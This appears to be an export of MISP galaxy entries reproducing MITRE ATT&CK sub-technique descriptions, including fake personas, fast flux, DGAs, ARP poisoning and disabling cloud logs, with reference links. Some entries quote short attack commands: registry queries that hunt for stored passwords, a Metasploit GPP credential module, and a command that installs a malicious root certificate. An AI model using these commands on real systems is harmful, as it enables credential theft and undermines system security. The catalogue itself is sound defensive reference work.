Adversaries may create and cultivate social media accounts that can be used during targeting. Adversaries can create social media accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)

For operations incorporating social engineering, the utilization of a persona on social media may be important. These personas may be fictitious or impersonate real people. The persona may exist on a single social media site or across multiple sites (ex: Facebook, LinkedIn, Twitter, etc.). Establishing a persona on social media may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos.

Once a persona has been developed an adversary can use it to create connections to targets of interest. These connections may be direct or may include trying to connect through others.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage) These accounts may be leveraged during other phases of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).

The tag is: misp-galaxy:mitre-attack-pattern="Social Media Accounts - T1585.001"

Table 3419. Table References
Links
https://attack.mitre.org/techniques/T1585/001
https://www.securityweek.com/iranian-hackers-targeted-us-officials-elaborate-social-media-attack-operation
http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf

Scanning IP Blocks - T1595.001

Adversaries may scan victim IP blocks to gather information that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses.

Adversaries may scan IP blocks in order to [Gather Victim Network Information](https://attack.mitre.org/techniques/T1590), such as which IP addresses are actively in use as well as more detailed information about hosts assigned these addresses. Scans may range from simple pings (ICMP requests and responses) to more nuanced scans that may reveal host software/versions via server banners or other network artifacts.(Citation: Botnet Scan) Information from these scans may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).

The tag is: misp-galaxy:mitre-attack-pattern="Scanning IP Blocks - T1595.001"

Table 3420. Table References
Links
https://attack.mitre.org/techniques/T1595/001
https://www.caida.org/publications/papers/2012/analysis_slash_zero/analysis_slash_zero.pdf

Component Object Model - T1559.001

Adversaries may use the Windows Component Object Model (COM) for local code execution. COM is an inter-process communication (IPC) component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces.(Citation: Fireeye Hunting COM June 2019) Through COM, a client object can call methods of server objects, which are typically binary Dynamic Link Libraries (DLL) or executables (EXE).(Citation: Microsoft COM) Remote COM execution is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM).(Citation: Fireeye Hunting COM June 2019)

Various COM interfaces are exposed that can be abused to invoke arbitrary execution via a variety of programming languages such as C, C++, Java, and [Visual Basic](https://attack.mitre.org/techniques/T1059/005).(Citation: Microsoft COM) Specific COM objects also exist to directly perform functions beyond code execution, such as creating a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), fileless download/execution, and other adversary behaviors related to privilege escalation and persistence.(Citation: Fireeye Hunting COM June 2019)(Citation: ProjectZero File Write EoP Apr 2018)

The tag is: misp-galaxy:mitre-attack-pattern="Component Object Model - T1559.001"

Table 3421. Table References
Links
https://attack.mitre.org/techniques/T1559/001
https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html
https://msdn.microsoft.com/library/windows/desktop/ms680573.aspx
https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html
https://enigma0x3.net/2017/11/16/lateral-movement-using-outlooks-createobject-method-and-dotnettojscript/
https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/

Social Media Accounts - T1586.001

Adversaries may compromise social media accounts that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating social media profiles (i.e. [Social Media Accounts](https://attack.mitre.org/techniques/T1585/001)), adversaries may compromise existing social media accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona.

A variety of methods exist for compromising social media accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, or by brute forcing credentials (ex: password reuse from breach credential dumps).(Citation: AnonHBGary) Prior to compromising social media accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.

Personas may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, etc.). Compromised social media accounts may require additional development, this could include filling out or modifying profile information, further developing social networks, or incorporating photos.

Adversaries can use a compromised social media profile to create new, or hijack existing, connections to targets of interest. These connections may be direct or may include trying to connect through others.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage) Compromised profiles may be leveraged during other phases of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).

The tag is: misp-galaxy:mitre-attack-pattern="Social Media Accounts - T1586.001"

Table 3422. Table References
Links
https://attack.mitre.org/techniques/T1586/001
https://arstechnica.com/tech-policy/2011/02/anonymous-speaks-the-inside-story-of-the-hbgary-hack/
https://www.securityweek.com/iranian-hackers-targeted-us-officials-elaborate-social-media-attack-operation
http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf

Fast Flux DNS - T1568.001

Adversaries may use Fast Flux DNS to hide a command and control channel behind an array of rapidly changing IP addresses linked to a single domain resolution. This technique uses a fully qualified domain name, with multiple IP addresses assigned to it which are swapped with high frequency, using a combination of round robin IP addressing and short Time-To-Live (TTL) for a DNS resource record.(Citation: MehtaFastFluxPt1)(Citation: MehtaFastFluxPt2)(Citation: Fast Flux - Welivesecurity)

The simplest, "single-flux" method, involves registering and de-registering an addresses as part of the DNS A (address) record list for a single DNS name. These registrations have a five-minute average lifespan, resulting in a constant shuffle of IP address resolution.(Citation: Fast Flux - Welivesecurity)

In contrast, the "double-flux" method registers and de-registers an address as part of the DNS Name Server record list for the DNS zone, providing additional resilience for the connection. With double-flux additional hosts can act as a proxy to the C2 host, further insulating the true source of the C2 channel.

The tag is: misp-galaxy:mitre-attack-pattern="Fast Flux DNS - T1568.001"

Table 3423. Table References
Links
https://attack.mitre.org/techniques/T1568/001
https://resources.infosecinstitute.com/fast-flux-networks-working-detection-part-1/#gref
https://resources.infosecinstitute.com/fast-flux-networks-working-detection-part-2/#gref
https://www.welivesecurity.com/2017/01/12/fast-flux-networks-work/

Threat Intel Vendors - T1597.001

Adversaries may search private data from threat intelligence vendors for information that can be used during targeting. Threat intelligence vendors may offer paid feeds or portals that offer more data than what is publicly reported. Although sensitive details (such as customer names and other identifiers) may be redacted, this information may contain trends regarding breaches such as target industries, attribution claims, and successful TTPs/countermeasures.(Citation: D3Secutrity CTI Feeds)

Adversaries may search in private threat intelligence vendor data to gather actionable information. Threat actors may seek information/indicators gathered about their own campaigns, as well as those conducted by other adversaries that may align with their target industries, capabilities/objectives, or other operational concerns. Information reported by vendors may also reveal opportunities other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).

The tag is: misp-galaxy:mitre-attack-pattern="Threat Intel Vendors - T1597.001"

Table 3424. Table References
Links
https://attack.mitre.org/techniques/T1597/001
https://d3security.com/blog/10-of-the-best-open-source-threat-intelligence-feeds/

Credentials in Registry - T1552.002

Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.

Example commands to find Registry keys related to password information: (Citation: Pentestlab Stored Credentials)

Local Machine Hive: <code>reg query HKLM /f password /t REG_SZ /s</code>
Current User Hive: <code>reg query HKCU /f password /t REG_SZ /s</code>

The tag is: misp-galaxy:mitre-attack-pattern="Credentials in Registry - T1552.002"

Table 3425. Table References
Links
https://attack.mitre.org/techniques/T1552/002
https://pentestlab.blog/2017/04/19/stored-credentials/

Domain Trust Modification - T1484.002

Adversaries may add new domain trusts or modify the properties of existing domain trusts to evade defenses and/or elevate privileges. Domain trust details, such as whether or not a domain is federated, allow authentication and authorization properties to apply between domains for the purpose of accessing shared resources.(Citation: Microsoft - Azure AD Federation) These trust objects may include accounts, credentials, and other authentication material applied to servers, tokens, and domains.

Manipulating the domain trusts may allow an adversary to escalate privileges and/or evade defenses by modifying settings to add objects which they control. For example, this may be used to forge [SAML Tokens](https://attack.mitre.org/techniques/T1606/002), without the need to compromise the signing certificate to forge new credentials. Instead, an adversary can manipulate domain trusts to add their own signing certificate.

The tag is: misp-galaxy:mitre-attack-pattern="Domain Trust Modification - T1484.002"

Table 3426. Table References
Links
https://attack.mitre.org/techniques/T1484/002
https://docs.microsoft.com/en-us/azure/active-directory/hybrid/whatis-fed
https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AuditLogs/ADFSDomainTrustMods.yaml
https://www.sygnia.co/golden-saml-advisory
https://us-cert.cisa.gov/ncas/alerts/aa21-008a
https://docs.microsoft.com/en-us/office365/troubleshoot/active-directory/update-federated-domain-office-365

Service Exhaustion Flood - T1499.002

Adversaries may target the different network services provided by systems to conduct a DoS. Adversaries often target DNS and web services, however others have been targeted as well.(Citation: Arbor AnnualDoSreport Jan 2018) Web server software can be attacked through a variety of means, some of which apply generally while others are specific to the software being used to provide the service.

One example of this type of attack is known as a simple HTTP flood, where an adversary sends a large number of HTTP requests to a web server to overwhelm it and/or an application that runs on top of it. This flood relies on raw volume to accomplish the objective, exhausting any of the various resources required by the victim software to provide the service.(Citation: Cloudflare HTTPflood)

Another variation, known as a SSL renegotiation attack, takes advantage of a protocol feature in SSL/TLS. The SSL/TLS protocol suite includes mechanisms for the client and server to agree on an encryption algorithm to use for subsequent secure connections. If SSL renegotiation is enabled, a request can be made for renegotiation of the crypto algorithm. In a renegotiation attack, the adversary establishes a SSL/TLS connection and then proceeds to make a series of renegotiation requests. Because the cryptographic renegotiation has a meaningful cost in computation cycles, this can cause an impact to the availability of the service when done in volume.(Citation: Arbor SSLDoS April 2012)

The tag is: misp-galaxy:mitre-attack-pattern="Service Exhaustion Flood - T1499.002"

Table 3427. Table References
Links
https://attack.mitre.org/techniques/T1499/002
https://capec.mitre.org/data/definitions/488.html
https://capec.mitre.org/data/definitions/489.html
https://capec.mitre.org/data/definitions/528.html
https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
https://www.cloudflare.com/learning/ddos/http-flood-ddos-attack/
https://www.netscout.com/blog/asert/ddos-attacks-ssl-something-old-something-new
https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf

Password Filter DLL - T1556.002

Adversaries may register malicious password filter dynamic link libraries (DLLs) into the authentication process to acquire user credentials as they are validated.

Windows password filters are password policy enforcement mechanisms for both domain and local accounts. Filters are implemented as DLLs containing a method to validate potential passwords against password policies. Filter DLLs can be positioned on local computers for local accounts and/or domain controllers for domain accounts. Before registering new passwords in the Security Accounts Manager (SAM), the Local Security Authority (LSA) requests validation from each registered filter. Any potential changes cannot take effect until every registered filter acknowledges validation.

Adversaries can register malicious password filters to harvest credentials from local computers and/or entire domains. To perform proper validation, filters must receive plain-text credentials from the LSA. A malicious password filter would receive these plain-text credentials every time a password request is made.(Citation: Carnal Ownage Password Filters Sept 2013)

The tag is: misp-galaxy:mitre-attack-pattern="Password Filter DLL - T1556.002"

Table 3428. Table References
Links
https://attack.mitre.org/techniques/T1556/002
http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/

Transmitted Data Manipulation - T1565.002

Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making.

Manipulation may be possible over a network connection or between system processes where there is an opportunity deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.

The tag is: misp-galaxy:mitre-attack-pattern="Transmitted Data Manipulation - T1565.002"

Table 3429. Table References
Links
https://attack.mitre.org/techniques/T1565/002
https://content.fireeye.com/apt/rpt-apt38
https://www.justice.gov/opa/press-release/file/1092091/download

Group Policy Preferences - T1552.006

Adversaries may attempt to find unsecured credentials in Group Policy Preferences (GPP). GPP are tools that allow administrators to create domain policies with embedded credentials. These policies allow administrators to set local accounts.(Citation: Microsoft GPP 2016)

These group policies are stored in SYSVOL on a domain controller. This means that any domain user can view the SYSVOL share and decrypt the password (using the AES key that has been made public).(Citation: Microsoft GPP Key)

The following tools and scripts can be used to gather and decrypt the password file from Group Policy Preference XML files:

Metasploit’s post exploitation module: <code>post/windows/gather/credentials/gpp</code>
Get-GPPPassword(Citation: Obscuresecurity Get-GPPPassword)
gpprefdecrypt.py

On the SYSVOL share, adversaries may use the following command to enumerate potential GPP XML files: <code>dir /s * .xml</code>

The tag is: misp-galaxy:mitre-attack-pattern="Group Policy Preferences - T1552.006"

Table 3430. Table References
Links
https://attack.mitre.org/techniques/T1552/006
https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn581922(v%3Dws.11)
https://msdn.microsoft.com/library/cc422924.aspx
https://obscuresecurity.blogspot.co.uk/2012/05/gpp-password-retrieval-with-powershell.html
https://adsecurity.org/?p=2288

ARP Cache Poisoning - T1557.002

Adversaries may poison Address Resolution Protocol (ARP) caches to position themselves between the communication of two or more networked devices. This activity may be used to enable follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002).

The ARP protocol is used to resolve IPv4 addresses to link layer addresses, such as a media access control (MAC) address.(Citation: RFC826 ARP) Devices in a local network segment communicate with each other by using link layer addresses. If a networked device does not have the link layer address of a particular networked device, it may send out a broadcast ARP request to the local network to translate the IP address to a MAC address. The device with the associated IP address directly replies with its MAC address. The networked device that made the ARP request will then use as well as store that information in its ARP cache.

An adversary may passively wait for an ARP request to poison the ARP cache of the requesting device. The adversary may reply with their MAC address, thus deceiving the victim by making them believe that they are communicating with the intended networked device. For the adversary to poison the ARP cache, their reply must be faster than the one made by the legitimate IP address owner. Adversaries may also send a gratuitous ARP reply that maliciously announces the ownership of a particular IP address to all the devices in the local network segment.

The ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver)

Adversaries may use ARP cache poisoning as a means to intercept network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003)

The tag is: misp-galaxy:mitre-attack-pattern="ARP Cache Poisoning - T1557.002"

Table 3431. Table References
Links
https://attack.mitre.org/techniques/T1557/002
https://tools.ietf.org/html/rfc826
https://pen-testing.sans.org/resources/papers/gcih/real-world-arp-spoofing-105411
https://web.archive.org/web/20200302085133/https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf

Dynamic Data Exchange - T1559.002

Adversaries may use Windows Dynamic Data Exchange (DDE) to execute arbitrary commands. DDE is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution.

Object Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by [Component Object Model](https://attack.mitre.org/techniques/T1559/001), DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys. (Citation: BleepingComputer DDE Disabled in Word Dec 2017) (Citation: Microsoft ADV170021 Dec 2017) (Citation: Microsoft DDE Advisory Nov 2017)

Microsoft Office documents can be poisoned with DDE commands (Citation: SensePost PS DDE May 2016) (Citation: Kettle CSV DDE Aug 2014), directly or through embedded files (Citation: Enigma Reviving DDE Jan 2018), and used to deliver execution via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros. (Citation: SensePost MacroLess DDE Oct 2017) DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). DDE execution can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM).(Citation: Fireeye Hunting COM June 2019)

The tag is: misp-galaxy:mitre-attack-pattern="Dynamic Data Exchange - T1559.002"

Table 3432. Table References
Links
https://attack.mitre.org/techniques/T1559/002
https://www.bleepingcomputer.com/news/microsoft/microsoft-disables-dde-feature-in-word-to-prevent-further-malware-attacks/
https://portal.msrc.microsoft.com/security-guidance/advisory/ADV170021
https://technet.microsoft.com/library/security/4053440
https://sensepost.com/blog/2016/powershell-c-sharp-and-dde-the-power-within/
https://www.contextis.com/blog/comma-separated-vulnerabilities
https://posts.specterops.io/reviving-dde-using-onenote-and-excel-for-code-execution-d7226864caee
https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/
https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html
https://blog.nviso.be/2017/10/11/detecting-dde-in-ms-office-documents/

Domain Generation Algorithms - T1568.002

Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)

DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)

Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)

The tag is: misp-galaxy:mitre-attack-pattern="Domain Generation Algorithms - T1568.002"

Table 3433. Table References
Links
https://attack.mitre.org/techniques/T1568/002
http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-Dissecting-DGAs-Eight-Real-World-DGA-Variants.pdf
https://umbrella.cisco.com/blog/2016/10/10/domain-generation-algorithms-effective/
https://unit42.paloaltonetworks.com/threat-brief-understanding-domain-generation-algorithms-dga/
http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html
https://blogs.akamai.com/2018/01/a-death-match-of-domain-generation-algorithms.html
https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html
https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/
https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
http://csis.pace.edu/_{ctappert/srd2017/2017PDF/d4.pdf[http://csis.pace.edu/}ctappert/srd2017/2017PDF/d4.pdf]
https://arxiv.org/pdf/1611.00791.pdf

Disable Cloud Logs - T1562.008

An adversary may disable cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection.

Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an attacker has sufficient permissions, they can disable logging to avoid detection of their activities. For example, in AWS an adversary may disable CloudWatch/CloudTrail integrations prior to conducting further malicious activity.(Citation: Following the CloudTrail: Generating strong AWS security signals with Sumo Logic)

The tag is: misp-galaxy:mitre-attack-pattern="Disable Cloud Logs - T1562.008"

Table 3434. Table References
Links
https://attack.mitre.org/techniques/T1562/008
https://expel.io/blog/following-cloudtrail-generating-aws-security-signals-sumo-logic/
https://docs.aws.amazon.com/awscloudtrail/latest/userguide/stop-cloudtrail-from-sending-events-to-cloudwatch-logs.html
https://cloud.google.com/logging/docs/audit/configure-data-access
https://docs.microsoft.com/en-us/cli/azure/monitor/diagnostic-settings?view=azure-cli-latest#az_monitor_diagnostic_settings_delete

Safe Mode Boot - T1562.009

Adversaries may abuse Windows safe mode to disable endpoint defenses. Safe mode starts up the Windows operating system with a limited set of drivers and services. Third-party security software such as endpoint detection and response (EDR) tools may not start after booting Windows in safe mode. There are two versions of safe mode: Safe Mode and Safe Mode with Networking. It is possible to start additional services after a safe mode boot.(Citation: Microsoft Safe Mode)(Citation: Sophos Snatch Ransomware 2019)

Adversaries may abuse safe mode to disable endpoint defenses that may not start with a limited boot. Hosts can be forced into safe mode after the next reboot via modifications to Boot Configuration Data (BCD) stores, which are files that manage boot application settings.(Citation: Microsoft bcdedit 2021)

Adversaries may also add their malicious applications to the list of minimal services that start in safe mode by modifying relevant Registry values (i.e. [Modify Registry](https://attack.mitre.org/techniques/T1112)). Malicious [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) objects may also be registered and loaded in safe mode.(Citation: Sophos Snatch Ransomware 2019)(Citation: CyberArk Labs Safe Mode 2016)(Citation: Cybereason Nocturnus MedusaLocker 2020)(Citation: BleepingComputer REvil 2021)

The tag is: misp-galaxy:mitre-attack-pattern="Safe Mode Boot - T1562.009"

Table 3435. Table References
Links
https://attack.mitre.org/techniques/T1562/009
https://support.microsoft.com/en-us/windows/start-your-pc-in-safe-mode-in-windows-10-92c27cff-db89-8644-1ce4-b3e5e56fe234
https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/
https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/bcdedit
https://www.cyberark.com/resources/blog/cyberark-labs-from-safe-mode-to-domain-compromise
https://www.cybereason.com/blog/medusalocker-ransomware
https://www.bleepingcomputer.com/news/security/revil-ransomware-has-a-new-windows-safe-mode-encryption-mode/
https://docs.microsoft.com/windows-server/administration/windows-commands/bootcfg

Create Cloud Instance - T1578.002

An adversary may create a new instance or virtual machine (VM) within the compute service of a cloud account to evade defenses. Creating a new instance may allow an adversary to bypass firewall rules and permissions that exist on instances currently residing within an account. An adversary may [Create Snapshot](https://attack.mitre.org/techniques/T1578/001) of one or more volumes in an account, create a new instance, mount the snapshots, and then apply a less restrictive security policy to collect [Data from Local System](https://attack.mitre.org/techniques/T1005) or for [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002).(Citation: Mandiant M-Trends 2020)

Creating a new instance may also allow an adversary to carry out malicious activity within an environment without affecting the execution of current running instances.

The tag is: misp-galaxy:mitre-attack-pattern="Create Cloud Instance - T1578.002"

Table 3436. Table References
Links
https://attack.mitre.org/techniques/T1578/002
https://content.fireeye.com/m-trends/rpt-m-trends-2020
https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
https://cloud.google.com/logging/docs/audit#admin-activity

Code Signing Certificates - T1587.002

Adversaries may create self-signed code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don’t know who issued the certificate or who the author is.

Prior to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may develop self-signed code signing certificates for use in operations.

The tag is: misp-galaxy:mitre-attack-pattern="Code Signing Certificates - T1587.002"

Table 3437. Table References
Links
https://attack.mitre.org/techniques/T1587/002
https://en.wikipedia.org/wiki/Code_signing

Purchase Technical Data - T1597.002

Adversaries may purchase technical information about victims that can be used during targeting. Information about victims may be available for purchase within reputable private sources and databases, such as paid subscriptions to feeds of scan databases or other data aggregation services. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.

Adversaries may purchase information about their already identified targets, or use purchased data to discover opportunities for successful breaches. Threat actors may gather various technical details from purchased data, including but not limited to employee contact information, credentials, or specifics regarding a victim’s infrastructure.(Citation: ZDNET Selling Data) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).

The tag is: misp-galaxy:mitre-attack-pattern="Purchase Technical Data - T1597.002"

Table 3438. Table References
Links
https://attack.mitre.org/techniques/T1597/002
https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/

Virtual Private Server - T1583.003

Adversaries may rent Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. By utilizing a VPS, adversaries can make it difficult to physically tie back operations to them. The use of cloud infrastructure can also make it easier for adversaries to rapidly provision, modify, and shut down their infrastructure.

Acquiring a VPS for use in later stages of the adversary lifecycle, such as Command and Control, can allow adversaries to benefit from the ubiquity and trust associated with higher reputation cloud service providers. Adversaries may also acquire infrastructure from VPS service providers that are known for renting VPSs with minimal registration information, allowing for more anonymous acquisitions of infrastructure.(Citation: TrendmicroHideoutsLease)

The tag is: misp-galaxy:mitre-attack-pattern="Virtual Private Server - T1583.003"

Table 3439. Table References
Links
https://attack.mitre.org/techniques/T1583/003
https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf
https://threatconnect.com/blog/infrastructure-research-hunting/
https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation
https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2

Install Root Certificate - T1553.004

Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root’s chain of trust that have been signed by the root certificate.(Citation: Wikipedia Root Certificate) Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.

Installation of a root certificate on a compromised system would give an adversary a way to degrade the security of that system. Adversaries have used this technique to avoid security warnings prompting users when compromised systems connect over HTTPS to adversary controlled web servers that spoof legitimate websites in order to collect login credentials.(Citation: Operation Emmental)

Atypical root certificates have also been pre-installed on systems by the manufacturer or in the software supply chain and were used in conjunction with malware/adware to provide [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) capability for intercepting information transmitted over secure TLS/SSL communications.(Citation: Kaspersky Superfish)

Root certificates (and their associated chains) can also be cloned and reinstalled. Cloned certificate chains will carry many of the same metadata characteristics of the source and can be used to sign malicious code that may then bypass signature validation tools (ex: Sysinternals, antivirus, etc.) used to block execution and/or uncover artifacts of Persistence.(Citation: SpectorOps Code Signing Dec 2017)

In macOS, the Ay MaMi malware uses <code>/usr/bin/security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain /path/to/malicious/cert</code> to install a malicious certificate as a trusted root certificate into the system keychain.(Citation: objective-see ay mami 2018)

The tag is: misp-galaxy:mitre-attack-pattern="Install Root Certificate - T1553.004"

Table 3440. Table References
Links
https://attack.mitre.org/techniques/T1553/004
https://capec.mitre.org/data/definitions/479.html
https://en.wikipedia.org/wiki/Root_certificate
http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-finding-holes-operation-emmental.pdf
https://www.kaspersky.com/blog/lenovo-pc-with-adware-superfish-preinstalled/7712/
https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec
https://objective-see.com/blog/blog_0x26.html
https://docs.microsoft.com/sysinternals/downloads/sigcheck
https://www.tripwire.com/state-of-security/off-topic/appunblocker-bypassing-applocker/

Virtual Private Server - T1584.003

Adversaries may compromise third-party Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. Adversaries may compromise VPSs purchased by third-party entities. By compromising a VPS to use as infrastructure, adversaries can make it difficult to physically tie back operations to themselves.(Citation: NSA NCSC Turla OilRig)

Compromising a VPS for use in later stages of the adversary lifecycle, such as Command and Control, can allow adversaries to benefit from the ubiquity and trust associated with higher reputation cloud service providers as well as that added by the compromised third-party.

The tag is: misp-galaxy:mitre-attack-pattern="Virtual Private Server - T1584.003"

Table 3441. Table References
Links
https://attack.mitre.org/techniques/T1584/003
https://media.defense.gov/2019/Oct/18/2002197242/-1/-1/0/NSA_CSA_Turla_20191021%20ver%204%20-%20nsa.gov.pdf
https://threatconnect.com/blog/infrastructure-research-hunting/
https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation
